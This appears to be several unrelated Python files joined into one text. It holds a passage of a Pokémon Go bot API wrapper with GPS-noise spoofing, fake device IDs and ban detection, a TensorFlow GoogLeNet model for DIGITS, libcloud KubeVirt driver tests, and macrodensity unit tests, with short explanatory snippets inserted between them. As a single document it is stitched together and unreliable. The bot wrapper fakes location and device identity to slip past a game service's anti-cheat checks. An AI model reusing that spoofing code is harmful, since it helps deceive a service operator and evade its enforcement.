self.actual_alt = PGoApi.get_position(self) self.teleporting = False self.noised_lat, self.noised_lng, self.noised_alt = self.actual_lat, self.actual_lng, self.actual_alt self.useVanillaRequest = False def gen_device_id(self): if self.config is None or self.config.username is None: ApiWrapper.DEVICE_ID = "3d65919ca1c2fc3a8e2bd7cc3f974c34" return file_salt = None did_path = os.path.join(_base_dir, 'data', 'deviceid-%s.txt' % self.config.username) if os.path.exists(did_path): file_salt = open(did_path, 'r').read() if self.config is not None: key_string = self.config.username if file_salt is not None: # Config and file are set, so use those. ApiWrapper.DEVICE_ID = hashlib.md5(key_string + file_salt).hexdigest() else: # Config is set, but file isn't, so make it. rand_float = random.SystemRandom().random() salt = base64.b64encode((struct.pack('!d', rand_float))) ApiWrapper.DEVICE_ID = hashlib.md5(key_string + salt).hexdigest() with open(did_path, "w") as text_file: text_file.write("{0}".format(salt)) else: if file_salt is not None: # No config, but there's a file, use it. ApiWrapper.DEVICE_ID = hashlib.md5(file_salt).hexdigest() else: # No config or file, so make up a reasonable default. 
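                # Note: this is the same fixed fallback used when no config or
                # username is given at all, so every install that reaches this
                # branch reports an identical device id.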
ApiWrapper.DEVICE_ID = "3d65919ca1c2fc3a8e2bd7cc3f974c34" def create_request(self): RequestClass = ApiRequest if self.useVanillaRequest: RequestClass = PGoApiRequest return RequestClass( self, self._position_lat, self._position_lng, self._position_alt ) def login(self, provider, username, password): # login needs base class "create_request" self.useVanillaRequest = True try: PGoApi.set_authentication( self, provider, username=username, password=password ) except: raise response = PGoApi.app_simulation_login(self) # cleanup code self.useVanillaRequest = False return response def set_position(self, lat, lng, alt=None, teleporting=False): self.actual_lat = lat self.actual_lng = lng if None != alt: self.actual_alt = alt else: alt = self.actual_alt self.teleporting = teleporting if self.config.replicate_gps_xy_noise: lat_noise = gps_noise_rng(self.config.gps_xy_noise_range) lng_noise = gps_noise_rng(self.config.gps_xy_noise_range) lat = lat + lat_noise lng = lng + lng_noise if self.config.replicate_gps_z_noise: alt_noise = gps_noise_rng(self.config.gps_z_noise_range) alt = alt + alt_noise self.noised_lat, self.noised_lng, self.noised_alt = lat, lng, alt PGoApi.set_position(self, lat, lng, alt) def get_position(self): return (self.actual_lat, self.actual_lng, self.actual_alt) class ApiRequest(PGoApiRequest): def __init__(self, *args): PGoApiRequest.__init__(self, *args) self.logger = logging.getLogger(__name__) self.request_callers = [] self.last_api_request_time = None self.requests_per_seconds = 2 def can_call(self): if not self._req_method_list: raise EmptySubrequestChainException() if (self._position_lat is None) or (self._position_lng is None) or (self._position_alt is None): raise NoPlayerPositionSetException() if self._auth_provider is None or not self._auth_provider.is_login(): self.log.info('Not logged in') raise NotLoggedInException() return True def _call(self): return PGoApiRequest.call(self) def _pop_request_callers(self): r = self.request_callers self.request_callers = [] return [i.upper() for i in r] def is_response_valid(self, result, request_callers): if not result or result is None or not isinstance(result, dict): return False if not 'responses' in result or not 'status_code' in result: return False if not isinstance(result['responses'], dict): return False try: # Permaban symptom is empty response to GET_INVENTORY and status_code = 3 if result['status_code'] == 3 and 'GET_INVENTORY' in request_callers and not result['responses'][ 'GET_INVENTORY']: raise PermaBannedException except KeyError: # Still wrong return False # the response can still programatically be valid at this point # but still be wrong. 
        # we need to check that the server actually sent back what we asked for
        for request_caller in request_callers:
            if request_caller not in result['responses']:
                return False

        return True

    def call(self, max_retry=15):
        request_callers = self._pop_request_callers()
        if not self.can_call():
            return False  # currently this is never run; exceptions are raised before

        request_timestamp = None
        api_req_method_list = self._req_method_list
        result = None
        try_cnt = 0
        throttling_retry = 0
        unexpected_response_retry = 0
        while True:
            request_timestamp = self.throttle_sleep()
            # self._call internally clears this field, so save it
            self._req_method_list = [req_method for req_method in api_req_method_list]

            should_throttle_retry = False
            should_unexpected_response_retry = False
            hashing_offline = False

            try:
                result = self._call()
            except ServerSideRequestThrottlingException:
                should_throttle_retry = True
            except HashingOfflineException:
                hashing_offline = True
            except UnexpectedResponseException:
                should_unexpected_response_retry = True
            except:
                should_unexpected_response_retry = True

            if hashing_offline:
                self.logger.warning('Hashing server issue, retrying in 5 Secs...')
                sleep(5)
                continue

            if should_throttle_retry:
                throttling_retry += 1
                if throttling_retry >= max_retry:
                    raise ServerSideRequestThrottlingException('Server throttled too many times')
                sleep(1)  # huge sleep ?
                continue  # skip response checking

            if should_unexpected_response_retry:
                unexpected_response_retry += 1
                if unexpected_response_retry >= 5:
                    self.logger.warning(
                        'Server is not responding correctly to our requests. Waiting for 30 seconds to reconnect.')
                    sleep(30)
                else:
                    sleep(2)
                continue

            if not self.is_response_valid(result, request_callers):
                try_cnt += 1
                if try_cnt > 3:
                    self.logger.warning(
                        'Server seems to be busy or offline - try again - {}/{}'.format(try_cnt, max_retry))
                if try_cnt >= max_retry:
                    raise ServerBusyOrOfflineException()
                sleep(1)
            else:
                break

        self.last_api_request_time = request_timestamp
        return result

    def __getattr__(self, func):
        if func.upper() in RequestType.keys():
            self.request_callers.append(func)
        return PGoApiRequest.__getattr__(self, func)

    def throttle_sleep(self):
        now_milliseconds = time.time() * 1000
        required_delay_between_requests = 1000 / self.requests_per_seconds
        difference = now_milliseconds - (self.last_api_request_time if self.last_api_request_time else 0)
        if self.last_api_request_time is not None and difference < required_delay_between_requests:
            sleep_time = required_delay_between_requests - difference
            time.sleep(sleep_time / 1000)
        return now_milliseconds
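# Hedged illustration, not part of the pgoapi wrapper above: throttle_sleep() enforces
# `requests_per_seconds` by sleeping away whatever remains of the per-request window.
# The standalone sketch below only mirrors that arithmetic; the names are illustrative.
def _throttle_delay_ms(now_ms, last_request_ms, requests_per_second=2):
    """Return how many milliseconds remain before the next request is allowed."""
    if last_request_ms is None:
        return 0.0
    required_gap_ms = 1000.0 / requests_per_second
    elapsed_ms = now_ms - last_request_ms
    return max(0.0, required_gap_ms - elapsed_ms)


if __name__ == "__main__":
    # At 2 requests/second the window is 500 ms; with 180 ms elapsed, ~320 ms remain.
    assert abs(_throttle_delay_ms(1180.0, 1000.0) - 320.0) < 1e-9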
# Preferred settings for this model is: # Training epochs = 80 # Crop Size = 224 # Learning Rate = 0.001 # Under advanced learning rate options: # Step Size = 10.0 # Gamma = 0.96 # The auxillary branches as spcified in the original googlenet V1 model do exist in this implementation of # googlenet but it is not used. To use it, be sure to check self.is_training to ensure that it is only used # during training. from model import Tower from utils import model_property import tensorflow as tf import utils as digits class UserModel(Tower): all_inception_settings = { '3a': [[64], [96, 128], [16, 32], [32]], '3b': [[128], [128, 192], [32, 96], [64]], '4a': [[192], [96, 208], [16, 48], [64]], '4b': [[160], [112, 224], [24, 64], [64]], '4c': [[128], [128, 256], [24, 64], [64]], '4d': [[112], [144, 288], [32, 64], [64]], '4e': [[256], [160, 320], [32, 128], [128]], '5a': [[256], [160, 320], [32, 128], [128]], '5b': [[384], [192, 384], [48, 128], [128]] } @model_property def inference(self): # rescale to proper form, really we expect 224 x 224 x 1 in HWC form model = tf.reshape(self.x, shape=[-1, self.input_shape[0], self.input_shape[1], self.input_shape[2]]) conv_7x7_2s_weight, conv_7x7_2s_bias = self.create_conv_vars([7, 7, self.input_shape[2], 64], 'conv_7x7_2s') model = self.conv_layer_with_relu(model, conv_7x7_2s_weight, conv_7x7_2s_bias, 2) model = self.max_pool(model, 3, 2) # model = tf.nn.local_response_normalization(model) conv_1x1_vs_weight, conv_1x1_vs_bias = self.create_conv_vars([1, 1, 64, 64], 'conv_1x1_vs') model = self.conv_layer_with_relu(model, conv_1x1_vs_weight, conv_1x1_vs_bias, 1, 'VALID') conv_3x3_1s_weight, conv_3x3_1s_bias = self.create_conv_vars([3, 3, 64, 192], 'conv_3x3_1s') model = self.conv_layer_with_relu(model, conv_3x3_1s_weight, conv_3x3_1s_bias, 1) # model = tf.nn.local_response_normalization(model) model = self.max_pool(model, 3, 2) inception_settings_3a = InceptionSettings(192, UserModel.all_inception_settings['3a']) model = self.inception(model, inception_settings_3a, '3a') inception_settings_3b = InceptionSettings(256, UserModel.all_inception_settings['3b']) model = self.inception(model, inception_settings_3b, '3b') model = self.max_pool(model, 3, 2) inception_settings_4a = InceptionSettings(480, UserModel.all_inception_settings['4a']) model = self.inception(model, inception_settings_4a, '4a') # first auxiliary branch for making training faster # aux_branch_1 = self.auxiliary_classifier(model, 512, "aux_1") inception_settings_4b = InceptionSettings(512, UserModel.all_inception_settings['4b']) model = self.inception(model, inception_settings_4b, '4b') inception_settings_4c = InceptionSettings(512, UserModel.all_inception_settings['4c']) model = self.inception(model, inception_settings_4c, '4c') inception_settings_4d = InceptionSettings(512, UserModel.all_inception_settings['4d']) model = self.inception(model, inception_settings_4d, '4d') # second auxiliary branch for making training faster # aux_branch_2 = self.auxiliary_classifier(model, 528, "aux_2") inception_settings_4e = InceptionSettings(528, UserModel.all_inception_settings['4e']) model = self.inception(model, inception_settings_4e, '4e') model = self.max_pool(model, 3, 2) inception_settings_5a = InceptionSettings(832, UserModel.all_inception_settings['5a']) model = self.inception(model, inception_settings_5a, '5a') inception_settings_5b = InceptionSettings(832, UserModel.all_inception_settings['5b']) model = self.inception(model, inception_settings_5b, '5b') model = self.avg_pool(model, 7, 1, 'VALID') 
fc_weight, fc_bias = self.create_fc_vars([1024, self.nclasses], 'fc') model = self.fully_connect(model, fc_weight, fc_bias) # if self.is_training: # return [aux_branch_1, aux_branch_2, model] return model @model_property def loss(self): model = self.inference loss = digits.classification_loss(model, self.y) accuracy = digits.classification_accuracy(model, self.y) self.summaries.append(tf.summary.scalar(accuracy.op.name, accuracy)) return loss def inception(self, model, inception_setting, layer_name): weights, biases = self.create_inception_variables(inception_setting, layer_name) conv_1x1 = self.conv_layer_with_relu(model, weights['conv_1x1_1'], biases['conv_1x1_1'], 1) conv_3x3 = self.conv_layer_with_relu(model, weights['conv_1x1_2'], biases['conv_1x1_2'], 1) conv_3x3 = self.conv_layer_with_relu(conv_3x3, weights['conv_3x3'], biases['conv_3x3'], 1) conv_5x5 = self.conv_layer_with_relu(model, weights['conv_1x1_3'], biases['conv_1x1_3'], 1) conv_5x5 = self.conv_layer_with_relu(conv_5x5, weights['conv_5x5'], biases['conv_5x5'], 1) conv_pool = self.max_pool(model, 3, 1) conv_pool = self.conv_layer_with_relu(conv_pool, weights['conv_pool'], biases['conv_pool'], 1) final_model = tf.concat([conv_1x1, conv_3x3, conv_5x5, conv_pool], 3) return final_model def create_inception_variables(self, inception_setting, layer_name): model_dim = inception_setting.model_dim conv_1x1_1_w, conv_1x1_1_b = self.create_conv_vars([1, 1, model_dim, inception_setting.conv_1x1_1_layers], layer_name + '-conv_1x1_1') conv_1x1_2_w, conv_1x1_2_b = self.create_conv_vars([1, 1, model_dim, inception_setting.conv_1x1_2_layers], layer_name + '-conv_1x1_2') conv_1x1_3_w, conv_1x1_3_b = self.create_conv_vars([1, 1, model_dim, inception_setting.conv_1x1_3_layers], layer_name + '-conv_1x1_3') conv_3x3_w, conv_3x3_b = self.create_conv_vars([3, 3, inception_setting.conv_1x1_2_layers, inception_setting.conv_3x3_layers], layer_name + '-conv_3x3') conv_5x5_w, conv_5x5_b = self.create_conv_vars([5, 5, inception_setting.conv_1x1_3_layers, inception_setting.conv_5x5_layers], layer_name + '-conv_5x5') conv_pool_w, conv_pool_b = self.create_conv_vars([1, 1, model_dim, inception_setting.conv_pool_layers], layer_name + '-conv_pool') weights = { 'conv_1x1_1': conv_1x1_1_w, 'conv_1x1_2': conv_1x1_2_w, 'conv_1x1_3': conv_1x1_3_w, 'conv_3x3': conv_3x3_w, 'conv_5x5': conv_5x5_w, 'conv_pool': conv_pool_w } biases = { 'conv_1x1_1': conv_1x1_1_b, 'conv_1x1_2': conv_1x1_2_b, 'conv_1x1_3': conv_1x1_3_b, 'conv_3x3': conv_3x3_b, 'conv_5x5': conv_5x5_b, 'conv_pool': conv_pool_b } return weights, biases def auxiliary_classifier(self, model, input_size, name): aux_classifier = self.avg_pool(model, 5, 3, 'VALID') conv_weight, conv_bias = self.create_conv_vars([1, 1, input_size, input_size], name + '-conv_1x1') aux_classifier = self.conv_layer_with_relu(aux_classifier, conv_weight, conv_bias, 1) fc_weight, fc_bias = self.create_fc_vars([4*4*input_size, self.nclasses], name + '-fc') aux_classifier = self.fully_connect(aux_classifier, fc_weight, fc_bias) aux_classifier = tf.nn.dropout(aux_classifier, 0.7) return aux_classifier def conv_layer_with_relu(self, model, weights, biases, stride_size, padding='SAME'): new_model = tf.nn.conv2d(model, weights, strides=[1, stride_size, stride_size, 1], padding=padding) new_model = tf.nn.bias_add(new_model, biases) new_model = tf.nn.relu(new_model) return new_model def max_pool(self, model, kernal_size, stride_size, padding='SAME'): new_model = tf.nn.max_pool(model, ksize=[1, kernal_size, kernal_size, 1], strides=[1, 
stride_size, stride_size, 1], padding=padding) return new_model def avg_pool(self, model, kernal_size, stride_size, padding='SAME'): new_model = tf.nn.avg_pool(model, ksize=[1, kernal_size, kernal_size, 1], strides=[1, stride_size, stride_size, 1], padding=padding) return new_model def fully_connect(self, model, weights, biases): fc_model = tf.reshape(model, [-1, weights.get_shape().as_list()[0]]) fc_model = tf.matmul(fc_model, weights) fc_model = tf.add(fc_model, biases) fc_model = tf.nn.relu(fc_model) return fc_model def create_conv_vars(self, size, name): weight = self.create_weight(size, name + '_W') bias = self.create_bias(size[3], name + '_b') return weight, bias def create_fc_vars(self, size, name): weight = self.create_weight(size, name + '_W') bias = self.create_bias(size[1], name + '_b') return weight, bias def create_weight(self, size, name): weight = tf.get_variable(name, size, initializer=tf.contrib.layers.xavier_initializer()) return weight def create_bias(self, size, name): bias = tf.get_variable(name, [size], initializer=tf.constant_initializer(0.2)) return bias class InceptionSettings(): def __init__(self, model_dim, inception_settings): self.model_dim = model_dim self.conv_1x1_1_layers = inception_settings[0][0] self.conv_1x1_2_layers = inception_settings[1][0] self.conv_1x1_3_layers = inception_settings[2][0] self.conv_3x3_layers = inception_settings[1][1] self.conv_5x5_layers = inception_settings[2][1] self.conv_pool_layers = inception_settings[3][0]
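# Hedged sanity check, not part of the DIGITS model above: the output depth of an inception
# block is the sum of its 1x1, 3x3, 5x5 and pool-projection widths, and that sum must equal
# the model_dim handed to the next block (e.g. 3a: 64 + 128 + 32 + 32 = 256, which is what
# 3b receives). The helper below only recomputes those sums from all_inception_settings.
def _inception_output_depth(settings):
    """Sum the concatenated branch widths for one row of all_inception_settings."""
    conv_1x1, conv_3x3_branch, conv_5x5_branch, pool_proj = settings
    return conv_1x1[0] + conv_3x3_branch[1] + conv_5x5_branch[1] + pool_proj[0]


if __name__ == '__main__':
    # 3a feeds 3b with 256 channels, 3b feeds the 4x stage with 480, 4e feeds 5a with 832.
    assert _inception_output_depth(UserModel.all_inception_settings['3a']) == 256
    assert _inception_output_depth(UserModel.all_inception_settings['3b']) == 480
    assert _inception_output_depth(UserModel.all_inception_settings['4e']) == 832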
# Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import sys from libcloud.compute.drivers.kubevirt import KubeVirtNodeDriver from libcloud.compute.types import NodeState from libcloud.utils.py3 import httplib from libcloud.test import unittest from libcloud.test import MockHttp from libcloud.test.common.test_kubernetes import KubernetesAuthTestCaseMixin from libcloud.test.file_fixtures import ComputeFileFixtures class KubeVirtTestCase(unittest.TestCase, KubernetesAuthTestCaseMixin): driver_cls = KubeVirtNodeDriver fixtures = ComputeFileFixtures('kubevirt') def setUp(self): KubeVirtNodeDriver.connectionCls.conn_class = KubeVirtMockHttp self.driver = KubeVirtNodeDriver(key='user', secret='pass', secure=True, host='foo', port=6443) def test_list_locations(self): locations = self.driver.list_locations() self.assertEqual(len(locations), 5) self.assertEqual(locations[0].name, 'default') self.assertEqual(locations[1].name, 'kube-node-lease') self.assertEqual(locations[2].name, 'kube-public') self.assertEqual(locations[3].name, 'kube-system') namespace4 = locations[0].driver.list_locations()[4].name self.assertEqual(namespace4, 'kubevirt') id4 = locations[2].driver.list_locations()[4].id self.assertEqual(id4, 'e6d3d7e8-0ee5-428b-8e17-5187779e5627') def test_list_nodes(self): nodes = self.driver.list_nodes() id0 = "74fd7665-fbd6-4565-977c-96bd21fb785a" self.assertEqual(len(nodes), 1) self.assertEqual(nodes[0].extra['namespace'], 'default') valid_node_states = {NodeState.RUNNING, NodeState.PENDING, NodeState.STOPPED} self.assertTrue(nodes[0].state in valid_node_states) self.assertEqual(nodes[0].name, 'testvm') self.assertEqual(nodes[0].id, id0) def test_destroy_node(self): nodes = self.driver.list_nodes() to_destroy = nodes[-1] resp = self.driver.destroy_node(to_destroy) self.assertTrue(resp) def test_start_node(self): nodes = self.driver.list_nodes() r1 = self.driver.start_node(nodes[0]) self.assertTrue(r1) def test_stop_node(self): nodes = self.driver.list_nodes() r1 = self.driver.stop_node(nodes[0]) self.assertTrue(r1) def test_reboot_node(self): nodes = self.driver.list_nodes() for node in nodes: if node.name == "testvm": resp = self.driver.reboot_node(node) self.assertTrue(resp) class KubeVirtMockHttp(MockHttp): fixtures = ComputeFileFixtures('kubevirt') def _api_v1_namespaces(self, method, url, body, headers): if method == "GET": body = self.fixtures.load('_api_v1_namespaces.json') else: raise AssertionError('Unsupported method') return (httplib.OK, body, {}, httplib.responses[httplib.OK]) def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachines(self, method, url, body, headers): if method == "GET": body = self.fixtures.load('get_default_vms.json') resp = httplib.OK elif method == "POST": body = self.fixtures.load('create_vm.json') resp = httplib.CREATED else: 
            raise AssertionError('Unsupported method')

        return (resp, body, {}, httplib.responses[httplib.OK])

    def _apis_kubevirt_io_v1alpha3_namespaces_kube_node_lease_virtualmachines(self, method, url, body, headers):
        if method == "GET":
            body = self.fixtures.load('get_kube_node_lease_vms.json')
        elif method == "POST":
            pass
        else:
            raise AssertionError('Unsupported method')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _apis_kubevirt_io_v1alpha3_namespaces_kube_public_virtualmachines(self, method, url, body, headers):
        if method == "GET":
            body = self.fixtures.load('get_kube_public_vms.json')
        elif method == "POST":
            pass
        else:
            raise AssertionError('Unsupported method')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _apis_kubevirt_io_v1alpha3_namespaces_kube_system_virtualmachines(self, method, url, body, headers):
        if method == "GET":
            body = self.fixtures.load('get_kube_system_vms.json')
        elif method == "POST":
            pass
        else:
            raise AssertionError('Unsupported method')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _apis_kubevirt_io_v1alpha3_namespaces_kubevirt_virtualmachines(self, method, url, body, headers):
        if method == "GET":
            body = self.fixtures.load('get_kube_public_vms.json')
        elif method == "POST":
            pass
        else:
            raise AssertionError('Unsupported method')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachines_testvm(self, method, url, body, headers):
        header = "application/merge-patch+json"
        data_stop = {"spec": {"running": False}}
        data_start = {"spec": {"running": True}}
        if method == "PATCH" and headers['Content-Type'] == header and body == data_start:
            body = self.fixtures.load('start_testvm.json')
        elif method == "PATCH" and headers['Content-Type'] == header and body == data_stop:
            body = self.fixtures.load('stop_testvm.json')
        else:
            raise AssertionError('Unsupported method')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachines_vm_cirros(self, method, url, body, headers):
        header = "application/merge-patch+json"
        data_stop = {"spec": {"running": False}}
        data_start = {"spec": {"running": True}}
        if method == "PATCH" and headers['Content-Type'] == header and body == data_start:
            body = self.fixtures.load('start_vm_cirros.json')
        elif method == "PATCH" and headers['Content-Type'] == header and body == data_stop:
            body = self.fixtures.load('stop_vm_cirros.json')
        else:
            raise AssertionError('Unsupported method')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachineinstances_testvm(self, method, url, body, headers):
        if method == "DELETE":
            body = self.fixtures.load('delete_vmi_testvm.json')
        else:
            raise AssertionError('Unsupported method')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _api_v1_namespaces_default_pods(self, method, url, body, headers):
        if method == "GET":
            body = self.fixtures.load('get_pods.json')
        else:
            raise AssertionError('Unsupported method')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _api_v1_namespaces_default_services(self, method, url, body, headers):
        if method == "GET":
            body = self.fixtures.load('get_services.json')
        else:
            raise AssertionError('Unsupported method')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])


if __name__ == '__main__':
    sys.exit(unittest.main())
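# Hedged illustration, not libcloud's actual driver code: the start/stop mocks above match on
# a JSON merge-patch body that only flips spec.running, sent with the
# "application/merge-patch+json" content type. A client-side sketch of that payload:
def _power_patch_body(running):
    """Build the minimal KubeVirt merge-patch document that toggles a VM on or off."""
    import json
    return json.dumps({"spec": {"running": bool(running)}})

# Example: _power_patch_body(True) -> '{"spec": {"running": true}}'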
from __future__ import print_function import unittest import sys import os import numpy as np import macrodensity as md import pkg_resources from os.path import join as path_join try: import pandas has_pandas = True except ImportError: has_pandas = False test_dir = os.path.abspath(os.path.dirname(__file__)) class TestDensityReadingFunctions(unittest.TestCase): ''' Test the code for reading in charge and density files''' def test_read_vasp(self): '''Test the function for reading CHGCAR/LOCPOT''' chgcar = pkg_resources.resource_filename( __name__, path_join('..', 'CHGCAR.test')) charge, ngx, ngy, ngz, lattice = md.read_vasp_density(chgcar, quiet=True) for v, t in ((charge, np.ndarray), (ngx, int), (ngy, int), (ngz, int), (lattice, np.ndarray)): self.assertIsInstance(v, t) self.assertEqual(charge[0], -.76010173913E+01) self.assertEqual(charge[56 * 56 * 56 -1], -4.4496715627) self.assertEqual(lattice[0, 0], 2.7150000) self.assertEqual(ngx, 56) def test_read_vasp_parchg(self): '''Test the function for reading CHGCAR/LOCPOT''' parchg = pkg_resources.resource_filename( __name__, path_join('..', 'PARCHG.test')) spin, ngx, ngy, ngz, lattice = md.read_vasp_parchg(parchg, quiet=True) for v, t in ((spin, np.ndarray), (ngx, int), (ngy, int), (ngz, int), (lattice, np.ndarray)): self.assertIsInstance(v, t) self.assertEqual(spin[0], 1.0) self.assertEqual(lattice[0, 0], 11.721852) spin, ngx, ngy, ngz, lattice = md.read_vasp_parchg(parchg, spin=True, quiet=True) for v, t in ((spin[0], np.ndarray), (ngx, int), (ngy, int), (ngz, int), (lattice, np.ndarray)): self.assertIsInstance(v, t) for v, t in ((spin[1], np.ndarray), (ngx, int), (ngy, int), (ngz, int), (lattice, np.ndarray)): self.assertIsInstance(v, t) self.assertEqual(spin[1][0], 0.0) def test_read_gulp(self): '''Test the function for reading GULP output''' gulpcar = pkg_resources.resource_filename( __name__, path_join('../examples', 'gulp.out')) potential, ngx, ngy, ngz, lattice = md.read_gulp_potential(gulpcar) for v, t in ((potential, np.ndarray), (ngx, int), (ngy, int), (ngz, int), (lattice, np.ndarray)): self.assertIsInstance(v, t) self.assertEqual(potential[0], 8.732207) self.assertEqual(potential[10 * 10 * 20 -1], 8.732207) self.assertEqual(lattice[0, 0], 11.996500) self.assertEqual(ngx, 10) def test_density_2_grid(self): '''Test the function for projecting the potential onto a grid''' chgcar = pkg_resources.resource_filename( __name__, path_join('..', 'CHGCAR.test')) charge, ngx, ngy, ngz, lattice = md.read_vasp_density(chgcar, quiet=True) grid_pot, electrons = md.density_2_grid(charge, ngx, ngy, ngz) self.assertAlmostEqual(grid_pot[0, 0, 0], - .76010173913E+01) self.assertAlmostEqual(grid_pot[55, 55, 55], -4.4496715627) self.assertAlmostEqual(electrons, 8.00000, places=4) @unittest.skipIf(not has_pandas, "Already using pandas-free reader") class TestDensityReadingFunctionsNoPandas(TestDensityReadingFunctions): """Disable Pandas and test code for reading charge and density files""" def setUp(self): self._pandas = sys.modules['pandas'] sys.modules['pandas'] = None def tearDown(self): sys.modules['pandas'] = self._pandas class TestOtherReadingFunctions(unittest.TestCase): def test_read_vasp_classic(self): '''Test the function for reading CHGCAR/LOCPOT''' chgcar = pkg_resources.resource_filename( __name__, path_join('..', 'CHGCAR.test')) (charge, ngx, ngy, ngz, lattice) = md.read_vasp_density_classic(chgcar) for v, t in ((charge, np.ndarray), (ngx, int), (ngy, int), (ngz, int), (lattice, np.ndarray)): self.assertIsInstance(v, t) 
self.assertEqual(charge[0], -.76010173913E+01) self.assertEqual(charge[56 * 56 * 56 -1], -4.4496715627) self.assertEqual(lattice[0, 0], 2.7150000) self.assertEqual(ngx, 56) def test_matrix_2_abc(self): '''Test conversion of lattice to abc, alpha, beta, gamma format''' lattice = np.asarray([[2.715, 2.715, 0.], [0., 2.715, 2.715], [2.715, 0., 2.715]]) a, b, c, a_vec, b_vec, c_vec = md.matrix_2_abc(lattice) self.assertAlmostEqual(a, 3.8395898218429529) self.assertAlmostEqual(b, 3.8395898218429529) self.assertAlmostEqual(c, 3.8395898218429529) class TestAveragingFunctions(unittest.TestCase): '''Test various functions for manipulating and measuring the density''' def test_planar_average(self): ''' Test the code for averaging the density''' test_grid = np.zeros(shape=(3, 3, 3)) for i in range(3): test_grid[i, :, 0] = float(i) planar = md.planar_average(test_grid, 3, 3, 3) self.assertAlmostEqual(planar[0], 1.0) planar = md.planar_average(test_grid, 3, 3, 3, axis='x') self.assertAlmostEqual(planar[2], 0.66666667) def test_volume_average(self): '''Test the volume_average function''' test_grid = np.zeros(shape=(5, 5, 5)) for i in range(5): for j in range(5): for k in range(5): test_grid[i, j, k] = float(i * j * k) potential, variance = md.volume_average([0, 0, 0], [2, 2, 2], test_grid, 5, 5, 5) self.assertAlmostEqual(potential, 0.125) self.assertAlmostEqual(variance, 0.109375) potential, variance = md.volume_average([1, 1, 1], [2, 2, 2], test_grid, 5, 5, 5) potential, variance = md.volume_average([1, 1, 1], [3, 3, 3], test_grid, 5, 5, 5) self.assertAlmostEqual(potential, 1.0) self.assertAlmostEqual(variance, 3.6296296296296298) def test_ipr(self): '''Test the ipr function''' parchg = pkg_resources.resource_filename( __name__, path_join('..', 'CHGCAR.test')) dens, ngx, ngy, ngz, lattice = md.read_vasp_density(parchg, quiet=True) self.assertAlmostEqual(md.inverse_participation_ratio(dens), 1.407e-5) class TestGeometryFunctions(unittest.TestCase): '''Test the functions that do geometry and trig''' def test_gradient_magnitude(self): '''Test the function for returning the magnitude of gradient at a voxel''' grid = np.zeros(shape=(3, 3, 3)) for i in range(3): for j in range(3): for k in range(3): grid[i, j, k] = i * j * k gx, gy, gz = np.gradient(grid) magnitudes = md.gradient_magnitude(gx, gy, gz) self.assertEqual(magnitudes[1, 1, 1], 1.7320508075688772) self.assertEqual(magnitudes[2, 2, 2], 6.9282032302755088) def test_macroscopic_average(self): '''Test the macroscopic averaging function''' f = 2. fs = 100 x = np.arange(fs) potential = [np.sin(2 * np.pi * f * (i/float(fs))) for i in np.arange(fs)] macro = md.macroscopic_average(potential, 50, 1) self.assertAlmostEqual(macro[20], 0.) def test_vector_2_abscissa(self): ''' Test the vector_2_abscissa function''' abscissa = md.vector_2_abscissa([5, 6, 7], 10, 0.2, 0.2, 0.2) self.assertEqual(abscissa[5], 10.488088481701517) def test_number_in_field(self): '''Test the number_in_field function''' test_field = np.zeros(shape=(5, 5, 5)) test_field[0, 0, 0] = 1. test_field[4, 4, 4] = 1. 
test_field[2, 3, 2] = 0.5 test_field[1, 4, 2] = 0.3 self.assertEqual(md.number_in_field(test_field, 0.3), 4) self.assertEqual(md.number_in_field(test_field, 0.5), 3) self.assertEqual(md.number_in_field(test_field, 1.0), 2) self.assertEqual(md.number_in_field(test_field, 1.1), 0) def test_element_vol(self): '''Test the element_vol function''' self.assertEqual(md.element_vol(3000.,10, 20, 30), 0.5) def test_get_volume(self): '''Test the get_volume function''' a = [5.43 * 0.5, 0., 5.43 * 0.5] b = [5.43 * 0.5, 5.43 * 0.5, 0.] c = [0., 5.43 * 0.5, 5.43 * 0.5] self.assertAlmostEqual(md.get_volume(a, b, c), 40.03, places=2) def test_numbers_2_grid(self): '''Tests the numbers_2_grid function''' a = md.numbers_2_grid([0.5, 0.5, 0.5], 10, 10, 10) b = [5, 5, 5] self.assertSequenceEqual(a.tolist(), b) def test_GCD(self): '''Test the GCD function''' self.assertEqual(md.GCD(100,12), 4) def test_GCD_List(self): '''Tests the GCD_List function''' self.assertEqual(md.GCD_List([15,100,45]), 5) if __name__ == '__main__': unittest.main()
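# Hedged reference sketch, not macrodensity's implementation: the behaviour exercised in
# TestAveragingFunctions.test_planar_average amounts to averaging the grid over the two axes
# perpendicular to the chosen one (numpy is already imported above as np).
def _planar_average_sketch(grid, axis=2):
    """Average a 3D grid over the two axes perpendicular to `axis`."""
    other_axes = tuple(ax for ax in range(3) if ax != axis)
    return np.asarray(grid).mean(axis=other_axes)

# For the grid used in test_planar_average (grid[i, :, 0] = i), the plane at z-index 0
# averages to (0 + 1 + 2) / 3 = 1.0, matching md.planar_average(test_grid, 3, 3, 3)[0].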
